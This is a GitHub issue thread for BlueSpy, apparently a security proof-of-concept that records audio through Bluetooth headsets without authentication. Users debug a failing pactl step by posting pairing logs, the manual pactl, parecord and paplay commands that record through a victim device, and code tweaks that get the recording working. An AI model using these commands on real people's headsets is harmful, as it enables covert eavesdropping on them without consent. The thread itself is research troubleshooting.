### ISSUE TITLE
Exception: ('Error while executing command pactl set-card-profile bluez_card.60_AB_D2_3B_29_70 headset-head-unit-msbc', '')

### ISSUE THREAD

**Issue by LeeKoTo** [TarlogicSecurity/BlueSpy#1]
when i run bluespy.py,i got this error
Exception: ('Error while executing command pactl set-card-profile bluez_card.60_AB_D2_3B_29_70 headset-head-unit-msbc', '')

**Comment by androidmalware** [comment]
It happened to me too. You need to run the command manually after the error: 

```
pactl set-card-profile bluez_card.60_AB_D2_3B_29_70 headset-head-unit-msbc
parecord -d bluez_input.60_AB_D2_3B_29_70.0 recording.wav
paplay -d bluez_output.60_AB_D2_3B_29_70.1 recording.wav
```

I explained and demonstrated it in my [blog post](https://www.mobile-hacker.com/2024/03/22/bluetooth-vulnerability-allows-unauthorized-user-to-record-and-play-audio-on-bluetooth-speakers/).

**Comment by srayneau** [comment]
Hello,

I'm trying with bose QC35 and RPI4 with kali.
The QC35 is connected with a laptop and can playing sound.

[I] Avoiding authentication with 60:AB:D2:43:0C:44...
[I] Generating shared key...
Traceback (most recent call last):
  File "/home/kali/sources/BlueSpy/BlueSpy.py", line 89, in <module>
    main()
  File "/home/kali/sources/BlueSpy/BlueSpy.py", line 69, in main
    pair(BluezTarget(args.address, args.address_type), verbose=False)
  File "/home/kali/sources/BlueSpy/core.py", line 95, in pair
    run_and_check(
  File "/home/kali/sources/BlueSpy/core.py", line 73, in run_and_check
    raise Exception(f"Error while executing command {cmdline}", out)
Exception: ('Error while executing command sudo btmgmt pair -c 3 -t 0 60:ab:d2:43:0c:44', 'Pairing with 60:AB:D2:43:0C:44 (BR/EDR)\nhci0 60:AB:D2:43:0C:44 type BR/EDR connected eir_len 14\n\x1b[0;91mPairing with 60:AB:D2:43:0C:44 (BR/EDR) failed. status 0x05 (Authentication Failed)\n\x1b[0m')


Manually:
└─$ sudo btmgmt pair -c 3 -t 0 60:ab:d2:43:0c:44
Pairing with 60:AB:D2:43:0C:44 (BR/EDR)
hci0 60:AB:D2:43:0C:44 type BR/EDR connected eir_len 14
Pairing with 60:AB:D2:43:0C:44 (BR/EDR) failed. status 0x05 (Authentication Failed)

Any idea ?

**Comment by antoniovazquezblanco** [comment]
Thanks for the report. We have just merged a change that allows you to run BlueSpy with the `-v` verbose flag to collect the full output of the error.

Could you please download the latest version and execute the program with the `-v` option to collect more information?

Thank you

**Comment by arobase-che** [comment]
Hello \o

Same problem. Here is the result with `-v` but I tried it on my phone instead of my earbuds (didn't read enough):

```shell
░█▀▄░█░░░█░█░█▀▀░█▀▀░█▀█░█░█░
░█▀▄░█░░░█░█░█▀▀░▀▀█░█▀▀░░█░░
░▀▀░░▀▀▀░▀▀▀░▀▀▀░▀▀▀░▀░░░░▀░░
░▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀░
Bluetooth audio recording tool by Tarlogic
[I] Avoiding authentication with XX:XX:XX:XX:CA:FE...
[I] Generating shared key...
[C] sudo btmgmt bondable true
hci0 Set Bondable complete, settings: powered ssp br/edr le secure-conn cis-central cis-peripheral 

[C] sudo btmgmt pairable true
hci0 Set Bondable complete, settings: powered ssp br/edr le secure-conn cis-central cis-peripheral 

[C] sudo btmgmt linksec false
hci0 Set Link Security complete, settings: powered ssp br/edr le secure-conn cis-central cis-peripheral 

[C] sudo btmgmt pair -c 3 -t 0 XX:XX:XX:XX:CA:FE
Pairing with XX:XX:XX:XX:CA:FE (BR/EDR)
hci0 XX:XX:XX:XX:CA:FE type BR/EDR connected eir_len 20
hci0 new_link_key XX:XX:XX:XX:CA:FE type 0x07 pin_len 0 store_hint 0
Paired with XX:XX:XX:XX:CA:FE (BR/EDR)

[!] Key generated
[I] Establishing connection...
[C] bluetoothctl --timeout 2 scan on
SetDiscoveryFilter success
Discovery started
[CHG] Controller XX:XX:XX:XX:DE:AD Discovering: yes
[NEW] Device XX:XX:XX:XX:F0:0D LE-MINOR III
[CHG] Device XX:XX:XX:XX:CA:FE Modalias: bluetooth:v0075p0100d0201
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx05-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx0a-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx0c-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx0e-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx12-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx15-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx16-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx1f-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx2d-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx2f-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx32-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx00-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx00-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx01-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx55-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE ServicesResolved: yes
[CHG] Device XX:XX:XX:XX:CA:FE Paired: yes

[C] bluetoothctl connect XX:XX:XX:XX:CA:FE
Attempting to connect to XX:XX:XX:XX:CA:FE
[CHG] Device XX:XX:XX:XX:F0:0D TxPower is nil
[CHG] Device XX:XX:XX:XX:F0:0D RSSI is nil
[CHG] Controller XX:XX:XX:XX:DE:AD Discovering: no
Failed to connect: org.bluez.Error.Failed br-connection-unknown

[I] Starting audio recording...
[!] Recording!
[C] pactl set-card-profile bluez_card.XX:XX:XX:XX:CA:FE headset-head-unit-msbc

Traceback (most recent call last):
  File "/home/ache/Test/BlueSpy/BlueSpy.py", line 87, in <module>
    main()
  File "/home/ache/Test/BlueSpy/BlueSpy.py", line 77, in main
    record(target, outfile=args.outfile, verbose=args.verbose)
  File "/home/ache/Test/BlueSpy/core.py", line 128, in record
    run_and_check(
  File "/home/ache/Test/BlueSpy/core.py", line 73, in run_and_check
    raise Exception(f"Error while executing command {cmdline}", out)
Exception: ('Error while executing command pactl set-card-profile bluez_card.XX:XX:XX:XX:CA:FE headset-head-unit-msbc', '')
```

On my phone, I had a quick flash notification `unable to pair`.

Trying to get more information by adding the `-m` flag to bluetoothctl then relaunching the script (only the interesting part): 

```
[C] bluetoothctl -m connect XX:XX:XX:XX:CA:FE
Unable to open logging channel
Attempting to connect to XX:XX:XX:XX:CA:FE
[DEL] Device XX:XX:XX:XX:F0:0D LE-MINOR III
[CHG] Device XX:XX:XX:XX:CA:FE Connected: yes
Failed to connect: org.bluez.Error.Failed br-connection-unknown
```

Humm ... Don't know why. sudo maybe ? >_<"

```
[C] sudo bluetoothctl -m connect XX:XX:XX:XX:CA:FE
Attempting to connect to XX:XX:XX:XX:CA:FE
hci0 device_flags_changed: 80:07:94:3C:B5:C6 (BR/EDR)
     supp: 0x00000001  curr: 0x00000000
Failed to connect: org.bluez.Error.Failed br-connection-unknown
```
Nope.

I tried `remove XX:XX:XX:XX:CA:FE` in bluetoothctl didn't work.

Using on my earbuds (with microphones):

```
░█▀▄░█░░░█░█░█▀▀░█▀▀░█▀█░█░█░
░█▀▄░█░░░█░█░█▀▀░▀▀█░█▀▀░░█░░
░▀▀░░▀▀▀░▀▀▀░▀▀▀░▀▀▀░▀░░░░▀░░
░▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀░
Bluetooth audio recording tool by Tarlogic
[I] Avoiding authentication with XX:XX:XX:XX:F0:0D...
[I] Generating shared key...
[C] sudo btmgmt bondable true
hci0 Set Bondable complete, settings: powered ssp br/edr le secure-conn cis-central cis-peripheral 

[C] sudo btmgmt pairable true
hci0 Set Bondable complete, settings: powered ssp br/edr le secure-conn cis-central cis-peripheral 

[C] sudo btmgmt linksec false
hci0 Set Link Security complete, settings: powered ssp br/edr le secure-conn cis-central cis-peripheral 

[C] sudo btmgmt pair -c 3 -t 0 XX:XX:XX:XX:F0:0D
Pairing with XX:XX:XX:XX:F0:0D (BR/EDR)
hci0 XX:XX:XX:XX:F0:0D type BR/EDR connect failed (status 0x04, Connect Failed)
Pairing with XX:XX:XX:XX:F0:0D (BR/EDR) failed. status 0x04 (Connect Failed)

Traceback (most recent call last):
  File "/home/ache/Test/BlueSpy/BlueSpy.py", line 87, in <module>
    main()
  File "/home/ache/Test/BlueSpy/BlueSpy.py", line 67, in main
    pair(target, verbose=args.verbose)
  File "/home/ache/Test/BlueSpy/core.py", line 95, in pair
    run_and_check(
  File "/home/ache/Test/BlueSpy/core.py", line 73, in run_and_check
    raise Exception(f"Error while executing command {cmdline}", out)
Exception: ('Error while executing command sudo btmgmt pair -c 3 -t 0 XX:XX:XX:XX:F0:0D', 'Pairing with XX:XX:XX:XX:F0:0D (BR/EDR)\nhci0 XX:XX:XX:XX:F0:0D type BR/EDR connect failed (status 0x04, Connect Failed)\n\x1b[0;91mPairing with XX:XX:XX:XX:F0:0D (BR/EDR) failed. status 0x04 (Connect Failed)\n\x1b[0m')
```

-m doesn't display more information.

I feel a little safer but still concern. Will try with another pair in two weeks.

**Comment by antoniovazquezblanco** [comment]
I suspect this may be multiple issues mixed. I am only going to deal with @LeeKoTo in this issue. I am going to move the rest of the comments to other threads/issues to deal with them separately.

**Comment by antoniovazquezblanco** [comment]
> when i run bluespy.py,i got this error Exception: ('Error while executing command pactl set-card-profile bluez_card.60_AB_D2_3B_29_70 headset-head-unit-msbc', '')

@LeeKoTo could you please post the execution logs with the `-v` parameter?
Thanks!

**Comment by LeeKoTo** [comment]
@antoniovazquezblanco  thanks,I am now running this script with three Bluetooth headsets. The code runs normally twice, and this error is reported once.
python3 BlueSpy.py -a FC:E8:06:72:07:F9 -v
```
Bluetooth audio recording tool by Tarlogic
[I] Avoiding authentication with FC:E8:06:72:07:F9...
[I] Generating shared key...
[C] sudo btmgmt bondable true
hci0 Set Bondable complete, settings: powered ssp br/edr le secure-conn

[C] sudo btmgmt pairable true
hci0 Set Bondable complete, settings: powered ssp br/edr le secure-conn

[C] sudo btmgmt linksec false
hci0 Set Link Security complete, settings: powered ssp br/edr le secure-conn

[C] sudo btmgmt pair -c 3 -t 0 fc:e8:06:72:07:f9
Pairing with FC:E8:06:72:07:F9 (BR/EDR)
hci0 FC:E8:06:72:07:F9 type BR/EDR connected eir_len 24
hci0 new_link_key FC:E8:06:72:07:F9 type 0x04 pin_len 0 store_hint 0
Paired with FC:E8:06:72:07:F9 (BR/EDR)

[!] Key generated
[I] The device is vulnerable!
[I] Establishing connection...
[C] bluetoothctl --timeout 2 scan on
Discovery started
[CHG] Controller D8:3A:DD:5B:43:44 Discovering: yes
[NEW] Device F8:24:41:0A:7C:5A F8-24-41-0A-7C-5A
[NEW] Device 73:2D:09:97:1E:6D 73-2D-09-97-1E-6D
[NEW] Device 5B:60:0D:CC:2D:28 5B-60-0D-CC-2D-28
[NEW] Device 4C:E1:74:31:FB:55 EFIII-150
[NEW] Device FC:E8:00:6A:EE:D1 EDIFIER BLE
[NEW] Device F8:24:41:06:29:0B F8-24-41-06-29-0B
[NEW] Device 59:20:4C:2B:C6:8E 59-20-4C-2B-C6-8E
[NEW] Device FC:E8:00:F8:6E:79 EDIFIER BLE
[NEW] Device 4C:37:F6:49:64:2B 4C-37-F6-49-64-2B
[NEW] Device 68:CE:B1:F9:0A:0A 68-CE-B1-F9-0A-0A
[NEW] Device 57:43:D1:0D:E5:57 57-43-D1-0D-E5-57
[NEW] Device 65:92:A8:F7:7F:7D 65-92-A8-F7-7F-7D
[NEW] Device 40:90:3A:06:48:4E 40-90-3A-06-48-4E
[CHG] Device FC:E8:06:72:07:F9 UUIDs: 00001101-0000-1000-8000-00805f9b34fb
[CHG] Device FC:E8:06:72:07:F9 UUIDs: 0000110b-0000-1000-8000-00805f9b34fb
[CHG] Device FC:E8:06:72:07:F9 UUIDs: 0000110c-0000-1000-8000-00805f9b34fb
[CHG] Device FC:E8:06:72:07:F9 UUIDs: 0000110e-0000-1000-8000-00805f9b34fb
[CHG] Device FC:E8:06:72:07:F9 UUIDs: 0000111e-0000-1000-8000-00805f9b34fb
[CHG] Device FC:E8:06:72:07:F9 ServicesResolved: yes
[CHG] Device FC:E8:06:72:07:F9 Paired: yes
[NEW] Device F8:24:41:08:35:13 F8-24-41-08-35-13
[NEW] Device F8:24:41:08:38:5C F8-24-41-08-38-5C

[C] bluetoothctl connect fc:e8:06:72:07:f9
Attempting to connect to fc:e8:06:72:07:f9
[NEW] Endpoint /org/bluez/hci0/dev_FC_E8_06_72_07_F9/sep1
[NEW] Endpoint /org/bluez/hci0/dev_FC_E8_06_72_07_F9/sep2
[NEW] Transport /org/bluez/hci0/dev_FC_E8_06_72_07_F9/sep1/fd4
Connection successful

[I] Starting audio recording...
[!] Recording!
[C] pactl set-card-profile bluez_card.FC_E8_06_72_07_F9 headset-head-unit-msbc

Traceback (most recent call last):
  File "/home/bluespy/BlueSpy/BlueSpy.py", line 89, in <module>
    main()
  File "/home/bluespy/BlueSpy/BlueSpy.py", line 79, in main
    record(target, outfile=args.outfile, verbose=args.verbose)
  File "/home/bluespy/BlueSpy/core.py", line 130, in record
    run_and_check(
  File "/home/bluespy/BlueSpy/core.py", line 73, in run_and_check
    raise Exception(f"Error while executing command {cmdline}", out)
Exception: ('Error while executing command pactl set-card-profile bluez_card.FC_E8_06_72_07_F9 headset-head-unit-msbc', '')

```

**Comment by LeeKoTo** [comment]
> It happened to me too. You need to run the command manually after the error:
> 
> ```
> pactl set-card-profile bluez_card.60_AB_D2_3B_29_70 headset-head-unit-msbc
> parecord -d bluez_input.60_AB_D2_3B_29_70.0 recording.wav
> paplay -d bluez_output.60_AB_D2_3B_29_70.1 recording.wav
> ```
> 
> I explained and demonstrated it in my [blog post](https://www.mobile-hacker.com/2024/03/22/bluetooth-vulnerability-allows-unauthorized-user-to-record-and-play-audio-on-bluetooth-speakers/).

thank u , u are right

**Comment by antoniovazquezblanco** [comment]
Executing the commands manually seems to solve the issue. I am thinking this may be a "timing issue". In https://github.com/TarlogicSecurity/BlueSpy/pull/8 a delay is added to see if this is enough... Whenever the PR is merged, let me know if this fixes it for you :)

**Comment by antoniovazquezblanco** [comment]
Merged #8 . Can you test again?

**Comment by LeeKoTo** [comment]
> Merged #8 . Can you test again?


Unfortunately, the problem still exists，error info as same as before

**Comment by androidmalware** [comment]
> Merged #8 . Can you test again?

I am also still receiving the same command exec error

```
Traceback (most recent call last): 
  File "/home/kali/tools/BlueSpy/BlueSpy.py", line 94, in <module>
    main()
  File "/home/kali/tools/BlueSpy/BlueSpy.py", line 84, in main
    record(target, outfile=args.outfile, verbose=args.verbose)
  File "/home/kali/tools/BlueSpy/core.py", line 119, in record
    run_and_check(
  File "/home/kali/tools/BlueSpy/system.py", line 35, in run_and_check
    raise CommandValidationException(cmdline, out)
system.CommandValidationException: ('Error while executing command "pactl set-card-profile bluez_card.04_FE_A1_40_EB_31 headset-head-unit-msbc"', '')
```

**Comment by hxrofo** [comment]
the way it worked for me is by checking the following:
pactl list cards |grep headset
there was only headset-head-unit,  NOT headset-head-unit-msbc
so i modified the code to:
pactl set-card-profile bluez_card.4C_72_74_90_0A_D8 headset-head-unit

**Comment by YSMELC** [comment]
> It happened to me too. You need to run the command manually after the error:
> 
> ```
> pactl set-card-profile bluez_card.60_AB_D2_3B_29_70 headset-head-unit-msbc
> parecord -d bluez_input.60_AB_D2_3B_29_70.0 recording.wav
> paplay -d bluez_output.60_AB_D2_3B_29_70.1 recording.wav
> ```
> 
> I explained and demonstrated it in my [blog post](https://www.mobile-hacker.com/2024/03/22/bluetooth-vulnerability-allows-unauthorized-user-to-record-and-play-audio-on-bluetooth-speakers/).

That's not working for me when I'm trying manually, it return "Failure : No such entity" or "Connection Refused" when I use pactl command

**Comment by vivmayz** [comment]
Hey guys, so I was running into the same issue, but it solved it for me by not running the commands as root (I am not completely sure why but somehow pulseaudio shouldn't be run as root). You need to check your user's permissions, it needs to have audio, pulse and pulse-access permissions. Afterwards I ran into the issue that parecord refused the permission to open the audio file, so you also have to make sure that your user has write permissions for the directory where the audio gets recorded. In the case of BlueSpy I added write-permission to the whole BlueSpy directory. Then everything should work :)

**Comment by ahmed200091** [comment]
When I enter orders that are written I get a mistake
pactl set-card-profile bluez_card.04_FE_A1_40_EB_31 headset-head-unit-msbc
Connection failure: Connection refused
pa_context_connect() failed: Connection refused

**Comment by taauxick** [comment]
> when i run bluespy.py,i got this error Exception: ('Error while executing command pactl set-card-profile bluez_card.60_AB_D2_3B_29_70 headset-head-unit-msbc', '')

hi i resolved this error by changing headset-head-unit-msbc profile to audio-gateway
you can change that in code in core.py 
def record(target: BluezTarget, outfile: str, verbose: bool = True):
    source_name = to_source_name(target)
    card_name = to_card_name(target)
    run_and_check(
        shlex.split(f"pactl set-card-profile {card_name} audio-gateway"),
        verbose=verbose,
    )


but i am still getting erroe in parecord

 raise CommandValidationException(cmdline, out)
system.CommandValidationException: ('Error while executing command "parecord -d bluez_input.94_8A_C6_A9_F0_C6.0 recording.wav"', '')

**Comment by hapii-lab** [comment]
I got the same issue 

"Connection failure: Connection refused
pa_context_connect() failed: Connection refused" 

when running as root, or 

"Failure: No such entity"

when not running as root. Has anyone successfully solved this?

**Comment by seeklakhan** [comment]
run these commands without root access 
pactl set-card-profile etc....

**Comment by CybersecH4cker** [comment]
> Hey guys, so I was running into the same issue, but it solved it for me by not running the commands as root (I am not completely sure why but somehow pulseaudio shouldn't be run as root). You need to check your user's permissions, it needs to have audio, pulse and pulse-access permissions. Afterwards I ran into the issue that parecord refused the permission to open the audio file, so you also have to make sure that your user has write permissions for the directory where the audio gets recorded. In the case of BlueSpy I added write-permission to the whole BlueSpy directory. Then everything should work :)
Hello can you please share how you ran the scr

**Comment by CybersecH4cker** [comment]
> > Hey guys, so I was running into the same issue, but it solved it for me by not running the commands as root (I am not completely sure why but somehow pulseaudio shouldn't be run as root). You need to check your user's permissions, it needs to have audio, pulse and pulse-access permissions. Afterwards I ran into the issue that parecord refused the permission to open the audio file, so you also have to make sure that your user has write permissions for the directory where the audio gets recorded. In the case of BlueSpy I added write-permission to the whole BlueSpy directory. Then everything should work :)

**Comment by CybersecH4cker** [comment]
Hello can you please share how you ran the BlueSpy script (pulseaudio) without root because I tried chown -R myusername:my username path to the file the owner changed but it still required sudo permission I also tried usermod -aG bluetooth command but none of the 2 commands work when I run pactll bluez head unit command it shows no such entry please help thanks

**Comment by diptesh-07** [comment]
hello, you can try different audio codec like cvsd 
`pactl set-card-profile {card_name}  headset-head-unit-msbc`
To
`pactl set-card-profile {card_name} headset-head-unit-cvsd`
its because of some problem audio parsing codec also you can change this line in line number 120 in BlueSpy.py 
`
def record(target: BluezTarget, outfile: str, verbose: bool = True):
    source_name = to_source_name(target)
    card_name = to_card_name(target)
    run_and_check(
        shlex.split(f"pactl set-card-profile {card_name} headset-head-unit-**cvsd**"),
        verbose=verbose,
    )
`
If this one not works for you. try different codec mentioned below
- sbc
- scc-xq
- aac

**Comment by CybersecH4cker** [comment]
> hello, you can try different audio codec like cvsd `pactl set-card-profile {card_name} headset-head-unit-msbc` To `pactl set-card-profile {card_name} headset-head-unit-cvsd` its because of some problem audio parsing codec also you can change this line in line number 120 in BlueSpy.py `def record(target: BluezTarget, outfile: str, verbose: bool = True): source_name = to_source_name(target) card_name = to_card_name(target) run_and_check( shlex.split(f"pactl set-card-profile {card_name} headset-head-unit-**cvsd**"), verbose=verbose, )` If this one not works for you. try different codec mentioned below
> 
> * sbc
> * scc-xq
> * aac
Thanks @diptesh-07
